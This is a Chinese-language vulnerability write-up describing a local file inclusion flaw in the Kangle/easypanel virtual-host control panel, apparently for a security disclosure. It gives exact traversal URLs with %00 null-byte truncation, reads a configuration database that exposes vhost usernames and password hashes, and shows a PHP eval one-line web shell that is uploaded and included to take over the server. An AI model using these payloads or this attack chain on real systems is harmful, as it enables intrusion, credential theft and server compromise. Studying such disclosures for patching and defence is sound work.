Kangle虚拟主机本地文件包含漏洞

测试环境：kangle-3.3.9.msi，ep-2.6.4.exe（官方4-18日更新），windows XP 首先安装kangle server，然后安装easypanel，安装成功后访问http://127.0.0.1:3312/，会自动跳转到http://127.0.0.1:3312/vhost/?c=session&a=loginForm。 然后随便输入用户名密码登陆，如图发送的请求：  然后修改请求url中的参数c的值，将session改为： C=../../../../../../../../../../../windows/system.ini%00.. （注意：这里必须有%00进行截断。） 发送修改后的请求将成功包含服务器上的/windows/system.ini文件，如下图所示：  漏洞利用： 前提：此系统是用来管理虚拟主机的，安装完成后，会有默认的管理员控制面板：http://127.0.0.1:3312/admin/?c=session&a=loginForm。他的主要功能就是在这里面可以添加很多网站进行统一管理，所以我们的利用前提就是这个系统里面已经有了很多网站。假设管理员已经在此系统上添加了两个网站，攻击者并不知道这两个网站，如下图：  下面开始攻击利用： 第一步，包含此系统的配置文件，如这里我们包含db文件： /Program Files/Bangteng/Kangle/etc/vhs.db（假设是windows系统的默认安装路径） 发送构造好的请求： http://127.0.0.1:3312/vhost/index.php?c=../../../../../../../../../../../Program Files/Bangteng/Kangle/etc/vhs.db%00..&a=login 包含的内容如图所示：  从返回的内容中看到，这里正好是vhost的相关信息： 123456e10adc3949ba59abbe56e057f20f883e/home/ftp/1/123456a1000 aaaaaa0b4e7a0e5fe84ad35fb5f95b9ceeac79C:/home/ftp/a/aaaaaaa1001 内容为： Vhost用户名+Vhost密码+Vhost-FTP路径+uid 第二步，既然拿到了Vhost用户名和Vhost密码，然后来登陆Vhost： http://127.0.0.1:3312/vhost/?c=session&a=loginForm 拿123456e10adc3949ba59abbe56e057f20f883e/home/ftp/1/123456a1000为例，这里的Vhost用户名和Vhost密码分别为：123456/123456. 第三步，利用在线文件功能，上传文件，如图：  我们这里上传一个php文件，内容为： <?php @eval($_POST['cmd']);phpinfo();?>，php一句话。 第四步，利用第一步包含到的信息：123456e10adc3949ba59abbe56e057f20f883e/home/ftp/1/123456a1000，我们知道上传的test.php文件在/home/ftp/1/12345/目录下，然后构造请求，包含此文件，如图：  返回内容显示成功包含。  成功拿webshell，控制网站服务器。